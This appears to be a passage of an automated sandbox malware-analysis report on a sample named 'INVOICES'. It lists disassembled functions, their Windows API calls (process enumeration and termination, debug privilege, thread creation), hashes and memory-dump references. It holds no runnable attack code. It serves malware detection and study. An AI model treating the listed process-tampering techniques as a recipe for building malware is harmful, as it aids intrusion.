                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                  • Opcode ID: 158cb696079e3ce66252fc6c4708527c5fe3d3896a4f44c71072bce37e44d166
                                                                                                                                  • Instruction ID: 74a5c8a058781000a889d3935091d1e24d99660fa30934fe960f9141aeca72c6
                                                                                                                                  • Opcode Fuzzy Hash: 158cb696079e3ce66252fc6c4708527c5fe3d3896a4f44c71072bce37e44d166
                                                                                                                                  • Instruction Fuzzy Hash: 4A11CEB1950218FEF6106B64CC89F6A7B2DEB4CB55F114529F644AB0A0C9FA6C109BA8
                                                                                                                                  Function 00788BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00788864,00000B00,?,?), ref: 00788BEC
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00788864), ref: 00788BF3
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00788864,00000B00,?,?), ref: 00788C08
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00788864,00000B00,?,?), ref: 00788C10
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00788864,00000B00,?,?), ref: 00788C13
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00788864,00000B00,?,?), ref: 00788C23
                                                                                                                                  • GetCurrentProcess.KERNEL32(00788864,00000000,?,00788864,00000B00,?,?), ref: 00788C2B
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00788864,00000B00,?,?), ref: 00788C2E
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00788C54,00000000,00000000,00000000), ref: 00788C48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1422014791-0
                                                                                                                                  • Opcode ID: 379f4abeea10506e5b5113a476669da562710ce078c9392ea0ca3a29e9967e41
                                                                                                                                  • Instruction ID: 26a3c6fadde1b911b516a1cf3187664def253afd9564e313422b633e7d216ad9
                                                                                                                                  • Opcode Fuzzy Hash: 379f4abeea10506e5b5113a476669da562710ce078c9392ea0ca3a29e9967e41
                                                                                                                                  • Instruction Fuzzy Hash: 1701ACB524034CFFE610AF69DC49F6B3B6CEB89B11F408521FA05DB191CA7498008B24
                                                                                                                                  Function 007A9228 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                  • Opcode ID: 60185a3a5a560fe52d95fd84e99cdafacad198bdb10d8d04938ef273ed402ddb
                                                                                                                                  • Instruction ID: e019376ce47f51d8b9feb736ac6e21a8f31de03af824c2dcaf2aca47c0f51994
                                                                                                                                  • Opcode Fuzzy Hash: 60185a3a5a560fe52d95fd84e99cdafacad198bdb10d8d04938ef273ed402ddb
                                                                                                                                  • Instruction Fuzzy Hash: 82919271A00255EBDF24DFA5C844FAFB7B8EF8A710F108659F605AB280D7789905CFA0
                                                                                                                                  Function 007A9872 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00787432: CLSIDFromProgID.COMBASE ref: 0078744F
                                                                                                                                    • Part of subcall function 00787432: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0078746A
                                                                                                                                    • Part of subcall function 00787432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0078736C,80070057,?,?), ref: 00787478
                                                                                                                                    • Part of subcall function 00787432: CoTaskMemFree.COMBASE(00000000), ref: 00787488
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007A991B
                                                                                                                                  • _memset.LIBCMT ref: 007A9928
                                                                                                                                  • _memset.LIBCMT ref: 007A9A6B
                                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 007A9A97
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 007A9AA2
                                                                                                                                  Strings
                                                                                                                                  • NULL Pointer assignment, xrefs: 007A9AF0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                  • Opcode ID: 7724dc4b9cc83e0dedf3e7fe114752f6d2ffb2cef541b5b7c3b8ca26bb943a8a
                                                                                                                                  • Instruction ID: d9b0850c231ed3e586478c1441092256ae81c7a7b8199f58d036686ad3cc296d
                                                                                                                                  • Opcode Fuzzy Hash: 7724dc4b9cc83e0dedf3e7fe114752f6d2ffb2cef541b5b7c3b8ca26bb943a8a
                                                                                                                                  • Instruction Fuzzy Hash: 6F913B71D00219EBDB10DFA4DC85EDEBBB9EF49710F20825AF519A7241DB749A44CFA0
                                                                                                                                  Function 007B6DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007B6E56
                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 007B6E6A
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007B6E84
                                                                                                                                  • _wcscat.LIBCMT ref: 007B6EDF
                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 007B6EF6
                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007B6F24
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                  • String ID: SysListView32
                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                  • Opcode ID: 72c0a26bef54b03a6e8a5bfafd4fcced52dd24ffd7fa37e265ece8cbef069a95
                                                                                                                                  • Instruction ID: f01b91fe0945162a7ced1ebee6c3978a4de4c6663f01567cb938bbf85e6df45a
                                                                                                                                  • Opcode Fuzzy Hash: 72c0a26bef54b03a6e8a5bfafd4fcced52dd24ffd7fa37e265ece8cbef069a95
                                                                                                                                  • Instruction Fuzzy Hash: CD41B075A00308EFEF219F64CC89FEE77A8EF08754F10442AFA44E7291D2799D848B64
                                                                                                                                  Function 007AEA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00793C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00793CBE
                                                                                                                                    • Part of subcall function 00793C99: Process32FirstW.KERNEL32(00000000,?), ref: 00793CCC
                                                                                                                                    • Part of subcall function 00793C99: CloseHandle.KERNEL32(00000000), ref: 00793D96
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007AEAB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 007AEACB
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007AEAFA
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007AEB77
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 007AEB82
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 007AEBB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                  • Opcode ID: e7d29d61a356a2e6e9d808fc8be4e651b370e0802a3eaf07b73379aa7e2710e0
                                                                                                                                  • Instruction ID: 2143390a176c3887c0aec875de279564050483cf66d29b17ea1abb16a764594b
                                                                                                                                  • Opcode Fuzzy Hash: e7d29d61a356a2e6e9d808fc8be4e651b370e0802a3eaf07b73379aa7e2710e0
                                                                                                                                  • Instruction Fuzzy Hash: 9841BD71200201DFDB14EF28CC99F6DB7A5AF84714F088558F9469F2D2CBBDA804CB96
                                                                                                                                  Function 0079302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 007930CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoad
                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                  • Opcode ID: 71859038e3b4d8c0b950bcc8c56b1101f5ba5ea6e27298f93cd9a870d5294ab5
                                                                                                                                  • Instruction ID: 6fc9b0b0e6adb7c3174f84443993ce83bce786507ce2042ce76b4598969d26a9
                                                                                                                                  • Opcode Fuzzy Hash: 71859038e3b4d8c0b950bcc8c56b1101f5ba5ea6e27298f93cd9a870d5294ab5
                                                                                                                                  • Instruction Fuzzy Hash: 9C112B35608347BADB205B59EC83DBA779DDF09760F20402AF908661C2DEBD9F0146A5
                                                                                                                                  Function 00794339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00794353
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 0079435A
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00794370
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00794377
                                                                                                                                  • _wprintf.LIBCMT ref: 0079439D
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007943BB
                                                                                                                                  Strings
                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00794398
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                  • Opcode ID: aef4af5ccfb7aa53ef19753ff6949b202dc86e8aadca8addcd8320cbfba7aa5c
                                                                                                                                  • Instruction ID: cba13b2cd3c3fc998d8915c869007196ebfc084b95b59ad1bb66ca1c911530a1
                                                                                                                                  • Opcode Fuzzy Hash: aef4af5ccfb7aa53ef19753ff6949b202dc86e8aadca8addcd8320cbfba7aa5c
                                                                                                                                  • Instruction Fuzzy Hash: E00162F290020CBFEB519BA4DD89FE6776CD708701F0046A5FB09E6051EA789E854B75
                                                                                                                                  Function 00732A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000), ref: 00732ACF
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000,000000FF), ref: 00732B17
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000), ref: 0076C39A
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000), ref: 0076C406
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                  • Opcode ID: f18392c7a9a87a0e02e6aa797c420c63e8215ac0ad6101e61e53454e468962a5
                                                                                                                                  • Instruction ID: a715b1a94682975318612ea9e02bdfd6d53910f3349dba2eeb9e968e719336df
                                                                                                                                  • Opcode Fuzzy Hash: f18392c7a9a87a0e02e6aa797c420c63e8215ac0ad6101e61e53454e468962a5
                                                                                                                                  • Instruction Fuzzy Hash: 5A41DA30204780ABE7369B29DC8CB7B7BD6BB45310F58C91DE98786663C67DA843D711
                                                                                                                                  Function 0079716F Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00797186
                                                                                                                                    • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                    • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007971BD
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 007971D9
                                                                                                                                  • _memmove.LIBCMT ref: 00797227
                                                                                                                                  • _memmove.LIBCMT ref: 00797244
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00797253
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00797268
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00797287
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                  • Opcode ID: 92dae3c6ac3523d913351e0195b10dc18e7ed07776ba9332f3a13263b857cc28
                                                                                                                                  • Instruction ID: 27eda28f68c5758974ff084e2f2888ee93fec54d68737cdde0728ce1a785ba3c
                                                                                                                                  • Opcode Fuzzy Hash: 92dae3c6ac3523d913351e0195b10dc18e7ed07776ba9332f3a13263b857cc28
                                                                                                                                  • Instruction Fuzzy Hash: BA316D32904209EBCF109F64DC89EAE7778FF45711F1481A5FD04AB286DB789E15CBA4
                                                                                                                                  Function 007B6205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007B621D
                                                                                                                                  • GetDC.USER32(00000000), ref: 007B6225
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B6230
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 007B623C
                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007B6278
                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007B6289
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007B905C,?,?,000000FF,00000000,?,000000FF,?), ref: 007B62C3
                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007B62E3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                  • Opcode ID: eec9e9cbad8d345c7a0d2e441e2180c44986a50ea89acded97d12d2e61db5530
                                                                                                                                  • Instruction ID: 3de0df963d2a1d88237a70360a088e23dbbc0a8015b3d7952899e156793c6bd4
                                                                                                                                  • Opcode Fuzzy Hash: eec9e9cbad8d345c7a0d2e441e2180c44986a50ea89acded97d12d2e61db5530
                                                                                                                                  • Instruction Fuzzy Hash: 5A314F76201214BFEB118F54DC4AFEA3BA9FF09755F044165FE089A291C6799C41CB64
                                                                                                                                  Function 00731424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
